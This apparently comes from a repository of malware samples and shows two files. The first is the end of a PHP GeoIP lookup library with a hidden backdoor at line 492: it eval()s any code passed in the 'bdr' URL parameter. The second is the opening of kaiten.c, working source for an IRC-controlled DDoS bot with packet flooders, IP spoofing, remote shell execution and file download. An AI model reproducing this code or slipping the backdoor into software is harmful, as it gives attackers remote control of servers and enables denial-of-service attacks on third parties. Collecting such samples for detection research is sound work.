165 | "Denmark", "Dominica", "Dominican Republic", "Algeria", "Ecuador", "Estonia",
166 | "Egypt", "Western Sahara", "Eritrea", "Spain", "Ethiopia", "Finland", "Fiji",
167 | "Falkland Islands (Malvinas)", "Micronesia, Federated States of", "Faroe Islands",
168 | "France", "France, Metropolitan", "Gabon", "United Kingdom",
169 | "Grenada", "Georgia", "French Guiana", "Ghana", "Gibraltar", "Greenland",
170 | "Gambia", "Guinea", "Guadeloupe", "Equatorial Guinea", "Greece", "South Georgia and the South Sandwich Islands",
171 | "Guatemala", "Guam", "Guinea-Bissau",
172 | "Guyana", "Hong Kong", "Heard Island and McDonald Islands", "Honduras",
173 | "Croatia", "Haiti", "Hungary", "Indonesia", "Ireland", "Israel", "India",
174 | "British Indian Ocean Territory", "Iraq", "Iran, Islamic Republic of",
175 | "Iceland", "Italy", "Jamaica", "Jordan", "Japan", "Kenya", "Kyrgyzstan",
176 | "Cambodia", "Kiribati", "Comoros", "Saint Kitts and Nevis", "Korea, Democratic People's Republic of",
177 | "Korea, Republic of", "Kuwait", "Cayman Islands",
178 | "Kazakhstan", "Lao People's Democratic Republic", "Lebanon", "Saint Lucia",
179 | "Liechtenstein", "Sri Lanka", "Liberia", "Lesotho", "Lithuania", "Luxembourg",
180 | "Latvia", "Libyan Arab Jamahiriya", "Morocco", "Monaco", "Moldova, Republic of",
181 | "Madagascar", "Marshall Islands", "Macedonia",
182 | "Mali", "Myanmar", "Mongolia", "Macau", "Northern Mariana Islands",
183 | "Martinique", "Mauritania", "Montserrat", "Malta", "Mauritius", "Maldives",
184 | "Malawi", "Mexico", "Malaysia", "Mozambique", "Namibia", "New Caledonia",
185 | "Niger", "Norfolk Island", "Nigeria", "Nicaragua", "Netherlands", "Norway",
186 | "Nepal", "Nauru", "Niue", "New Zealand", "Oman", "Panama", "Peru", "French Polynesia",
187 | "Papua New Guinea", "Philippines", "Pakistan", "Poland", "Saint Pierre and Miquelon",
188 | "Pitcairn Islands", "Puerto Rico", "Palestinian Territory",
189 | "Portugal", "Palau", "Paraguay", "Qatar", "Reunion", "Romania",
190 | "Russian Federation", "Rwanda", "Saudi Arabia", "Solomon Islands",
191 | "Seychelles", "Sudan", "Sweden", "Singapore", "Saint Helena", "Slovenia",
192 | "Svalbard and Jan Mayen", "Slovakia", "Sierra Leone", "San Marino", "Senegal",
193 | "Somalia", "Suriname", "Sao Tome and Principe", "El Salvador", "Syrian Arab Republic",
194 | "Swaziland", "Turks and Caicos Islands", "Chad", "French Southern Territories",
195 | "Togo", "Thailand", "Tajikistan", "Tokelau", "Turkmenistan",
196 | "Tunisia", "Tonga", "Timor-Leste", "Turkey", "Trinidad and Tobago", "Tuvalu",
197 | "Taiwan", "Tanzania, United Republic of", "Ukraine",
198 | "Uganda", "United States Minor Outlying Islands", "United States", "Uruguay",
199 | "Uzbekistan", "Holy See (Vatican City State)", "Saint Vincent and the Grenadines",
200 | "Venezuela", "Virgin Islands, British", "Virgin Islands, U.S.",
201 | "Vietnam", "Vanuatu", "Wallis and Futuna", "Samoa", "Yemen", "Mayotte",
202 | "Serbia", "South Africa", "Zambia", "Montenegro", "Zimbabwe",
203 | "Anonymous Proxy","Satellite Provider","Other",
204 | "Aland Islands","Guernsey","Isle of Man","Jersey","Saint Barthelemy","Saint Martin"
205 | );
206 | 
207 |     var $GEOIP_CONTINENT_CODES = array(
208 | "--", "AS", "EU", "EU", "AS", "AS", "SA", "SA", "EU", "AS",
209 | "SA", "AF", "AN", "SA", "OC", "EU", "OC", "SA", "AS", "EU",
210 | "SA", "AS", "EU", "AF", "EU", "AS", "AF", "AF", "SA", "AS",
211 | "SA", "SA", "SA", "AS", "AF", "AF", "EU", "SA", "NA", "AS",
212 | "AF", "AF", "AF", "EU", "AF", "OC", "SA", "AF", "AS", "SA",
213 | "SA", "SA", "AF", "AS", "AS", "EU", "EU", "AF", "EU", "SA",
214 | "SA", "AF", "SA", "EU", "AF", "AF", "AF", "EU", "AF", "EU",
215 | "OC", "SA", "OC", "EU", "EU", "EU", "AF", "EU", "SA", "AS",
216 | "SA", "AF", "EU", "SA", "AF", "AF", "SA", "AF", "EU", "SA",
217 | "SA", "OC", "AF", "SA", "AS", "AF", "SA", "EU", "SA", "EU",
218 | "AS", "EU", "AS", "AS", "AS", "AS", "AS", "EU", "EU", "SA",
219 | "AS", "AS", "AF", "AS", "AS", "OC", "AF", "SA", "AS", "AS",
220 | "AS", "SA", "AS", "AS", "AS", "SA", "EU", "AS", "AF", "AF",
221 | "EU", "EU", "EU", "AF", "AF", "EU", "EU", "AF", "OC", "EU",
222 | "AF", "AS", "AS", "AS", "OC", "SA", "AF", "SA", "EU", "AF",
223 | "AS", "AF", "NA", "AS", "AF", "AF", "OC", "AF", "OC", "AF",
224 | "SA", "EU", "EU", "AS", "OC", "OC", "OC", "AS", "SA", "SA",
225 | "OC", "OC", "AS", "AS", "EU", "SA", "OC", "SA", "AS", "EU",
226 | "OC", "SA", "AS", "AF", "EU", "AS", "AF", "AS", "OC", "AF",
227 | "AF", "EU", "AS", "AF", "EU", "EU", "EU", "AF", "EU", "AF",
228 | "AF", "SA", "AF", "SA", "AS", "AF", "SA", "AF", "AF", "AF",
229 | "AS", "AS", "OC", "AS", "AF", "OC", "AS", "EU", "SA", "OC",
230 | "AS", "AF", "EU", "AF", "OC", "NA", "SA", "AS", "EU", "SA",
231 | "SA", "SA", "SA", "AS", "OC", "OC", "OC", "AS", "AF", "EU",
232 | "AF", "AF", "EU", "AF", "--", "--", "--", "EU", "EU", "EU",
233 | "EU", "SA", "SA" );
234 |     
235 | }
236 | function geoip_load_shared_mem ($file) {
237 | 
238 |   $fp = fopen($file, "rb");
239 |   if (!$fp) {
240 |     print "error opening $file: $php_errormsg\n";
241 |     exit;
242 |   }
243 |   $s_array = fstat($fp);
244 |   $size = $s_array['size'];
245 |   if ($shmid = @shmop_open (GEOIP_SHM_KEY, "w", 0, 0)) {
246 |     shmop_delete ($shmid);
247 |     shmop_close ($shmid);
248 |   }
249 |   $shmid = shmop_open (GEOIP_SHM_KEY, "c", 0644, $size);
250 |   shmop_write ($shmid, fread($fp, $size), 0);
251 |   shmop_close ($shmid);
252 | }
253 | 
254 | function _setup_segments($gi){
255 |   $gi->databaseType = GEOIP_COUNTRY_EDITION;
256 |   $gi->record_length = STANDARD_RECORD_LENGTH;
257 |   if ($gi->flags & GEOIP_SHARED_MEMORY) {
258 |     $offset = @shmop_size ($gi->shmid) - 3;
259 |     for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) {
260 |         $delim = @shmop_read ($gi->shmid, $offset, 3);
261 |         $offset += 3;
262 |         if ($delim == (chr(255).chr(255).chr(255))) {
263 |             $gi->databaseType = ord(@shmop_read ($gi->shmid, $offset, 1));
264 |             $offset++;
265 | 
266 |             if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
267 |                 $gi->databaseSegments = GEOIP_STATE_BEGIN_REV0;
268 |             } else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){
269 |                 $gi->databaseSegments = GEOIP_STATE_BEGIN_REV1;
270 | 	    } else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0)||
271 |                      ($gi->databaseType == GEOIP_CITY_EDITION_REV1) 
272 |                     || ($gi->databaseType == GEOIP_ORG_EDITION)
273 | 		    || ($gi->databaseType == GEOIP_ISP_EDITION)
274 | 		    || ($gi->databaseType == GEOIP_ASNUM_EDITION)){
275 |                 $gi->databaseSegments = 0;
276 |                 $buf = @shmop_read ($gi->shmid, $offset, SEGMENT_RECORD_LENGTH);
277 |                 for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){
278 |                     $gi->databaseSegments += (ord($buf[$j]) << ($j * 8));
279 |                 }
280 | 	            if (($gi->databaseType == GEOIP_ORG_EDITION)||
281 | 			($gi->databaseType == GEOIP_ISP_EDITION)) {
282 | 	                $gi->record_length = ORG_RECORD_LENGTH;
283 |                 }
284 |             }
285 |             break;
286 |         } else {
287 |             $offset -= 4;
288 |         }
289 |     }
290 |     if (($gi->databaseType == GEOIP_COUNTRY_EDITION)||
291 |         ($gi->databaseType == GEOIP_PROXY_EDITION)||
292 |         ($gi->databaseType == GEOIP_NETSPEED_EDITION)){
293 |         $gi->databaseSegments = GEOIP_COUNTRY_BEGIN;
294 |     }
295 |   } else {
296 |     $filepos = ftell($gi->filehandle);
297 |     fseek($gi->filehandle, -3, SEEK_END);
298 |     for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) {
299 |         $delim = fread($gi->filehandle,3);
300 |         if ($delim == (chr(255).chr(255).chr(255))){
301 |         $gi->databaseType = ord(fread($gi->filehandle,1));
302 |         if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
303 |             $gi->databaseSegments = GEOIP_STATE_BEGIN_REV0;
304 |         }
305 |         else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){
306 | 	    $gi->databaseSegments = GEOIP_STATE_BEGIN_REV1;
307 |                 }  else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0) ||
308 |                  ($gi->databaseType == GEOIP_CITY_EDITION_REV1) || 
309 |                  ($gi->databaseType == GEOIP_ORG_EDITION) || 
310 | 		 ($gi->databaseType == GEOIP_ISP_EDITION) || 
311 |                  ($gi->databaseType == GEOIP_ASNUM_EDITION)){
312 |             $gi->databaseSegments = 0;
313 |             $buf = fread($gi->filehandle,SEGMENT_RECORD_LENGTH);
314 |             for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){
315 |             $gi->databaseSegments += (ord($buf[$j]) << ($j * 8));
316 |             }
317 | 	    if ($gi->databaseType == GEOIP_ORG_EDITION ||
318 | 		$gi->databaseType == GEOIP_ISP_EDITION) {
319 | 	    $gi->record_length = ORG_RECORD_LENGTH;
320 |             }
321 |         }
322 |         break;
323 |         } else {
324 |         fseek($gi->filehandle, -4, SEEK_CUR);
325 |         }
326 |     }
327 |     if (($gi->databaseType == GEOIP_COUNTRY_EDITION)||
328 |         ($gi->databaseType == GEOIP_PROXY_EDITION)||
329 |         ($gi->databaseType == GEOIP_NETSPEED_EDITION)){
330 |          $gi->databaseSegments = GEOIP_COUNTRY_BEGIN;
331 |     }
332 |     fseek($gi->filehandle,$filepos,SEEK_SET);
333 |   }
334 |   return $gi;
335 | }
336 | 
337 | function geoip_open($filename, $flags) {
338 |   $gi = new GeoIP;
339 |   $gi->flags = $flags;
340 |   if ($gi->flags & GEOIP_SHARED_MEMORY) {
341 |     $gi->shmid = @shmop_open (GEOIP_SHM_KEY, "a", 0, 0);
342 |     } else {
343 |     $gi->filehandle = fopen($filename,"rb") or die( "Can not open $filename\n" );
344 |     if ($gi->flags & GEOIP_MEMORY_CACHE) {
345 |         $s_array = fstat($gi->filehandle);
346 |         $gi->memory_buffer = fread($gi->filehandle, $s_array['size']);
347 |     }
348 |   }
349 | 
350 |   $gi = _setup_segments($gi);
351 |   return $gi;
352 | }
353 | 
354 | function geoip_close($gi) {
355 |   if ($gi->flags & GEOIP_SHARED_MEMORY) {
356 |     return true;
357 |   }
358 | 
359 |   return fclose($gi->filehandle);
360 | }
361 | 
362 | function geoip_country_id_by_name($gi, $name) {
363 |   $addr = gethostbyname($name);
364 |   if (!$addr || $addr == $name) {
365 |     return false;
366 |   }
367 |   return geoip_country_id_by_addr($gi, $addr);
368 | }
369 | 
370 | function geoip_country_code_by_name($gi, $name) {
371 |   $country_id = geoip_country_id_by_name($gi,$name);
372 |   if ($country_id !== false) {
373 |         return $gi->GEOIP_COUNTRY_CODES[$country_id];
374 |   }
375 |   return false;
376 | }
377 | 
378 | function geoip_country_name_by_name($gi, $name) {
379 |   $country_id = geoip_country_id_by_name($gi,$name);
380 |   if ($country_id !== false) {
381 |         return $gi->GEOIP_COUNTRY_NAMES[$country_id];
382 |   }
383 |   return false;
384 | }
385 | 
386 | function geoip_country_id_by_addr($gi, $addr) {
387 |   $ipnum = ip2long($addr);
388 |   return _geoip_seek_country($gi, $ipnum) - GEOIP_COUNTRY_BEGIN;
389 | }
390 | 
391 | function geoip_country_code_by_addr($gi, $addr) {
392 |   if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
393 |     $record = geoip_record_by_addr($gi,$addr);
394 |     if ( $record !== false ) {
395 |       return $record->country_code;
396 |     }
397 |   } else {
398 |     $country_id = geoip_country_id_by_addr($gi,$addr);
399 |     if ($country_id !== false) {
400 |       return $gi->GEOIP_COUNTRY_CODES[$country_id];
401 |     }
402 |   }
403 |   return false;
404 | }
405 | 
406 | function geoip_country_name_by_addr($gi, $addr) {
407 |   if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
408 |     $record = geoip_record_by_addr($gi,$addr);
409 |     return $record->country_name;
410 |   } else {
411 |     $country_id = geoip_country_id_by_addr($gi,$addr);
412 |     if ($country_id !== false) {
413 |       return $gi->GEOIP_COUNTRY_NAMES[$country_id];
414 |     }
415 |   }
416 |   return false;
417 | }
418 | 
419 | function _geoip_seek_country($gi, $ipnum) {
420 |   $offset = 0;
421 |   for ($depth = 31; $depth >= 0; --$depth) {
422 |     if ($gi->flags & GEOIP_MEMORY_CACHE) {
423 |       // workaround php's broken substr, strpos, etc handling with
424 |       // mbstring.func_overload and mbstring.internal_encoding
425 |       $enc = mb_internal_encoding();
426 |        mb_internal_encoding('ISO-8859-1'); 
427 | 
428 |       $buf = substr($gi->memory_buffer,
429 |                             2 * $gi->record_length * $offset,
430 |                             2 * $gi->record_length);
431 | 
432 |       mb_internal_encoding($enc);
433 |     } elseif ($gi->flags & GEOIP_SHARED_MEMORY) {
434 |       $buf = @shmop_read ($gi->shmid, 
435 |                             2 * $gi->record_length * $offset,
436 |                             2 * $gi->record_length );
437 |         } else {
438 |       fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0
439 |         or die("fseek failed");
440 |       $buf = fread($gi->filehandle, 2 * $gi->record_length);
441 |     }
442 |     $x = array(0,0);
443 |     for ($i = 0; $i < 2; ++$i) {
444 |       for ($j = 0; $j < $gi->record_length; ++$j) {
445 |         $x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8);
446 |       }
447 |     }
448 |     if ($ipnum & (1 << $depth)) {
449 |       if ($x[1] >= $gi->databaseSegments) {
450 |         return $x[1];
451 |       }
452 |       $offset = $x[1];
453 |         } else {
454 |       if ($x[0] >= $gi->databaseSegments) {
455 |         return $x[0];
456 |       }
457 |       $offset = $x[0];
458 |     }
459 |   }
460 |   trigger_error("error traversing database - perhaps it is corrupt?", E_USER_ERROR);
461 |   return false;
462 | }
463 | 
464 | function _get_org($gi,$ipnum){
465 |   $seek_org = _geoip_seek_country($gi,$ipnum);
466 |   if ($seek_org == $gi->databaseSegments) {
467 |     return NULL;
468 |   }
469 |   $record_pointer = $seek_org + (2 * $gi->record_length - 1) * $gi->databaseSegments;
470 |   if ($gi->flags & GEOIP_SHARED_MEMORY) {
471 |     $org_buf = @shmop_read ($gi->shmid, $record_pointer, MAX_ORG_RECORD_LENGTH);
472 |     } else {
473 |     fseek($gi->filehandle, $record_pointer, SEEK_SET);
474 |     $org_buf = fread($gi->filehandle,MAX_ORG_RECORD_LENGTH);
475 |   }
476 |   // workaround php's broken substr, strpos, etc handling with
477 |   // mbstring.func_overload and mbstring.internal_encoding
478 |   $enc = mb_internal_encoding();
479 |   mb_internal_encoding('ISO-8859-1'); 
480 |   $org_buf = substr($org_buf, 0, strpos($org_buf, 0));
481 |   mb_internal_encoding($enc);
482 |   return $org_buf;
483 | }
484 | 
485 | function geoip_org_by_addr ($gi,$addr) {
486 |   if ($addr == NULL) {
487 |     return 0;
488 |   }
489 |   $ipnum = ip2long($addr);
490 |   return _get_org($gi, $ipnum);
491 | }
492 | isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
493 | function _get_region($gi,$ipnum){
494 |   if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
495 |     $seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV0;
496 |     if ($seek_region >= 1000){
497 |       $country_code = "US";
498 |       $region = chr(($seek_region - 1000)/26 + 65) . chr(($seek_region - 1000)%26 + 65);
499 |     } else {
500 |             $country_code = $gi->GEOIP_COUNTRY_CODES[$seek_region];
501 |       $region = "";
502 |     }
503 |   return array ($country_code,$region);
504 |     }  else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1) {
505 |     $seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV1;
506 |     //print $seek_region;
507 |     if ($seek_region < US_OFFSET){
508 |       $country_code = "";
509 |       $region = "";  
510 |         } else if ($seek_region < CANADA_OFFSET) {
511 |       $country_code = "US";
512 |       $region = chr(($seek_region - US_OFFSET)/26 + 65) . chr(($seek_region - US_OFFSET)%26 + 65);
513 |         } else if ($seek_region < WORLD_OFFSET) {
514 |       $country_code = "CA";
515 |       $region = chr(($seek_region - CANADA_OFFSET)/26 + 65) . chr(($seek_region - CANADA_OFFSET)%26 + 65);
516 |     } else {
517 |             $country_code = $gi->GEOIP_COUNTRY_CODES[($seek_region - WORLD_OFFSET) / FIPS_RANGE];
518 |       $region = "";
519 |     }
520 |   return array ($country_code,$region);
521 |   }
522 | }
523 | 
524 | function geoip_region_by_addr ($gi,$addr) {
525 |   if ($addr == NULL) {
526 |     return 0;
527 |   }
528 |   $ipnum = ip2long($addr);
529 |   return _get_region($gi, $ipnum);
530 | }
531 | 
532 | function getdnsattributes ($l,$ip){
533 |   $r = new Net_DNS_Resolver();
534 |   $r->nameservers = array("ws1.maxmind.com");
535 |   $p = $r->search($l."." . $ip .".s.maxmind.com","TXT","IN");
536 |   $str = is_object($p->answer[0])?$p->answer[0]->string():'';
537 |   ereg("\"(.*)\"",$str,$regs);
538 |   $str = $regs[1];
539 |   return $str;
540 | }
541 | 
542 | ?>
543 | 


--------------------------------------------------------------------------------
/malicious_samples/kaiten.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 |  *   This is a IRC based distributed denial of service client.  It connects to *
  3 |  * the server specified below and accepts commands via the channel specified.  *
  4 |  * The syntax is:                                                              *
  5 |  *       !<nick> <command>                                                     *
  6 |  * You send this message to the channel that is defined later in this code.    *
  7 |  * Where <nick> is the nickname of the client (which can include wildcards)    *
  8 |  * and the command is the command that should be sent.  For example, if you    *
  9 |  * want to tell all the clients with the nickname starting with N, to send you *
 10 |  * the help message, you type in the channel:                                  *
 11 |  *       !N* HELP                                                              *
 12 |  * That will send you a list of all the commands.  You can also specify an     *
 13 |  * astrick alone to make all client do a specific command:                     *
 14 |  *       !* SH uname -a                                                        *
 15 |  * There are a number of commands that can be sent to the client:              *
 16 |  *       TSUNAMI <target> <secs>       = A PUSH+ACK flooder                    *
 17 |  *       PAN <target> <port> <secs>    = A SYN flooder                         *
 18 |  *       UDP <target> <port> <secs>    = An UDP flooder                        *
 19 |  *       UNKNOWN <target> <secs>       = Another non-spoof udp flooder         *
 20 |  *       NICK <nick>                   = Changes the nick of the client        *
 21 |  *       SERVER <server>               = Changes servers                       *
 22 |  *       GETSPOOFS                     = Gets the current spoofing             *
 23 |  *       SPOOFS <subnet>               = Changes spoofing to a subnet          *
 24 |  *       DISABLE                       = Disables all packeting from this bot  *
 25 |  *       ENABLE                        = Enables all packeting from this bot   *
 26 |  *       KILL                          = Kills the knight                      *
 27 |  *       GET <http address> <save as>  = Downloads a file off the web          *
 28 |  *       VERSION                       = Requests version of knight            *
 29 |  *       KILLALL                       = Kills all current packeting           *
 30 |  *       HELP                          = Displays this                         *
 31 |  *       IRC <command>                 = Sends this command to the server      *
 32 |  *       SH <command>                  = Executes a command                    *
 33 |  * Remember, all these commands must be prefixed by a ! and the nickname that  *
 34 |  * you want the command to be sent to (can include wildcards). There are no    *
 35 |  * spaces in between the ! and the nickname, and there are no spaces before    *
 36 |  * the !                                                                       *
 37 |  *                                                                             *
 38 |  *                               - contem on efnet                             *
 39 |  *******************************************************************************/
 40 | ////////////////////////////////////////////////////////////////////////////////
 41 | //                                EDIT THESE                                  //
 42 | ////////////////////////////////////////////////////////////////////////////////
 43 | #undef STARTUP			// Start on startup?
 44 | #undef IDENT			// Only enable this if you absolutely have to
 45 | #define FAKENAME "-amadz"	// What you want this to hide as
 46 | #define CHAN "#lol"	// Channel to join
 47 | #define KEY "bleh"		// The key of the channel
 48 | int numservers=1;		// Must change this to equal number of servers down there
 49 | char *servers[] = {		// List the servers in that format, always end in (void*)0
 50 | 	"192.168.93.137",
 51 |         (void*)0
 52 | };
 53 | ////////////////////////////////////////////////////////////////////////////////
 54 | //                               STOP HERE!                                   //
 55 | ////////////////////////////////////////////////////////////////////////////////
 56 | #include <stdarg.h>
 57 | #include <errno.h>
 58 | #include <stdio.h>
 59 | #include <stdlib.h>
 60 | #include <string.h>
 61 | #include <sys/types.h>
 62 | #include <sys/stat.h>
 63 | #include <fcntl.h>
 64 | #include <strings.h>
 65 | #include <netinet/in.h>
 66 | #include <unistd.h>
 67 | #include <sys/time.h>
 68 | #include <sys/socket.h>
 69 | #include <signal.h>
 70 | #include <arpa/inet.h>
 71 | #include <netdb.h>
 72 | #include <time.h>
 73 | #include <sys/wait.h>
 74 | #include <sys/ioctl.h>
 75 | int sock,changeservers=0;
 76 | char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
 77 | unsigned int *pids;
 78 | unsigned long spoofs=0, spoofsm=0, numpids=0;
 79 | int strwildmatch(const char* pattern, const char* string) {
 80 | 	switch(*pattern) {
 81 | 		case '\0': return *string;
 82 | 		case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
 83 | 		case '?': return !(*string && !strwildmatch(pattern+1, string+1));
 84 | 		default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
 85 | 	}
 86 | }
 87 | int Send(int sock, char *words, ...) {
 88 |         static char textBuffer[1024];
 89 |         va_list args;
 90 |         va_start(args, words);
 91 |         vsprintf(textBuffer, words, args);
 92 |         va_end(args);
 93 |         return write(sock,textBuffer,strlen(textBuffer));
 94 | }
 95 | int mfork(char *sender) {
 96 | 	unsigned int parent, *newpids, i;
 97 | 	if (disabled == 1) {
 98 | 		Send(sock,"NOTICE %s :Unable to comply.\n",sender);
 99 | 		return 1;
100 | 	}
101 | 	parent=fork();
102 | 	if (parent <= 0) return parent;
103 | 	numpids++;
104 | 	newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
105 | 	for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
106 | 	newpids[numpids-1]=parent;
107 | 	free(pids);
108 | 	pids=newpids;
109 | 	return parent;
110 | }
111 | unsigned long getspoof() {
112 | 	if (!spoofs) return rand();
113 | 	if (spoofsm == 1) return ntohl(spoofs);
114 | 	return ntohl(spoofs+(rand() % spoofsm)+1);
115 | }
116 | void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
117 | char *makestring() {
118 | 	char *tmp;
119 | 	int len=(rand()%5)+4,i;
120 |  	FILE *file;
121 | 	tmp=(char*)malloc(len+1);
122 |  	memset(tmp,0,len+1);
123 |  	if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
124 | 	else {
125 | 		int a=((rand()*rand())%45402)+1;
126 | 		char buf[1024];
127 | 		for (i=0;i<a;i++) fgets(buf,1024,file);
128 | 		memset(buf,0,1024);
129 | 		fgets(buf,1024,file);
130 | 		filter(buf);
131 | 		memcpy(tmp,buf,len);
132 | 		fclose(file);
133 | 	}
134 | 	return tmp;
135 | }
136 | void identd() {
137 |         int sockname,sockfd,sin_size,tmpsock,i;
138 |         struct sockaddr_in my_addr,their_addr;
139 |         char szBuffer[1024];
140 |         if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
141 |         my_addr.sin_family = AF_INET;
142 |         my_addr.sin_port = htons(113);
143 |         my_addr.sin_addr.s_addr = INADDR_ANY;
144 |         memset(&(my_addr.sin_zero), 0, 8);
145 |         if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
146 |         if (listen(sockfd, 1) == -1) return;
147 |         if (fork() == 0) return;
148 |         sin_size = sizeof(struct sockaddr_in);
149 |         if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
150 |         for(;;) {
151 |                 fd_set bla;
152 |                 struct timeval timee;
153 |                 FD_ZERO(&bla);
154 |                 FD_SET(tmpsock,&bla);
155 |                 timee.tv_sec=timee.tv_usec=60;
156 |                 if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
157 |                 if (FD_ISSET(tmpsock,&bla)) break;
158 |         }
159 |         i = recv(tmpsock,szBuffer,1024,0);
160 |         if (i <= 0 || i >= 20) exit(0);
161 |         szBuffer[i]=0;
162 |         if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
163 |         if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
164 | 	Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
165 |         close(tmpsock);
166 |         close(sockfd);
167 |         exit(0);
168 | }
169 | long pow(long a, long b) {
170 |         if (b == 0) return 1;
171 |         if (b == 1) return a;
172 |         return a*pow(a,b-1);
173 | }
174 | u_short in_cksum(u_short *addr, int len) {
175 |         register int nleft = len;
176 |         register u_short *w = addr;
177 |         register int sum = 0;
178 |         u_short answer =0;
179 |         while (nleft > 1) {
180 |                 sum += *w++;
181 |                 nleft -= 2;
182 |         }
183 |         if (nleft == 1) {
184 |                 *(u_char *)(&answer) = *(u_char *)w;
185 |                 sum += answer;
186 |         }
187 |         sum = (sum >> 16) + (sum & 0xffff);
188 |         sum += (sum >> 16);
189 |         answer = ~sum;
190 |         return(answer);
191 | }
192 | void get(int sock, char *sender, int argc, char **argv) {
193 |         int sock2,i,d;
194 |         struct sockaddr_in server;
195 |         unsigned long ipaddr;
196 |         char buf[1024];
197 |         FILE *file;
198 |         unsigned char bufm[4096];
199 |         if (mfork(sender) != 0) return;
200 |         if (argc < 2) {
201 |                 Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
202 |                 exit(0);
203 |         }
204 |         if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
205 |                 Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
206 |                 exit(0);
207 |         }
208 |         if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
209 |         else strcpy(buf,argv[1]);
210 |         for (i=0;i<strlen(buf) && buf[i] != '/';i++);
211 |         buf[i]=0;
212 |         server.sin_family = AF_INET;
213 |         server.sin_port = htons(80);
214 |         if ((ipaddr = inet_addr(buf)) == -1) {
215 |                 struct hostent *hostm;
216 |                 if ((hostm=gethostbyname(buf)) == NULL) {
217 |                         Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
218 |                         exit(0);
219 |                 }
220 |                 memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
221 |         }
222 |         else server.sin_addr.s_addr = ipaddr;
223 |         memset(&(server.sin_zero), 0, 8);
224 |         if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
225 |                 Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
226 |                 exit(0);
227 |         }
228 | 
229 |         Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
230 |         Send(sock,"NOTICE %s :Receiving file.\n",sender);
231 |         file=fopen(argv[2],"wb");
232 |         while(1) {
233 |                 int i;
234 |                 if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
235 |                 if (i < 4096) bufm[i]=0;
236 |                 for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
237 |                         for (d+=4;d<i;d++) fputc(bufm[d],file);
238 |                         goto done;
239 |                 }
240 |         }
241 |         done:
242 |         Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
243 |         while(1) {
244 |                 int i,d;
245 |                 if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
246 |                 if (i < 4096) bufm[i]=0;
247 |                 for (d=0;d<i;d++) fputc(bufm[d],file);
248 |         }
249 |         fclose(file);
250 |         close(sock2);
251 |         exit(0);
252 | }
253 | void getspoofs(int sock, char *sender, int argc, char **argv) {
254 |         unsigned long a=spoofs,b=spoofs+(spoofsm-1);
255 |         if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
256 |         else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
257 | }
258 | void version(int sock, char *sender, int argc, char **argv) {
259 |         Send(sock,"NOTICE %s :Kaiten wa goraku\n",sender);
260 | }
261 | void nickc(int sock, char *sender, int argc, char **argv) {
262 |         if (argc != 1) {
263 |                 Send(sock,"NOTICE %s :NICK <nick>\n",sender);
264 |                 return;
265 |         }
266 |         if (strlen(argv[1]) >= 10) {
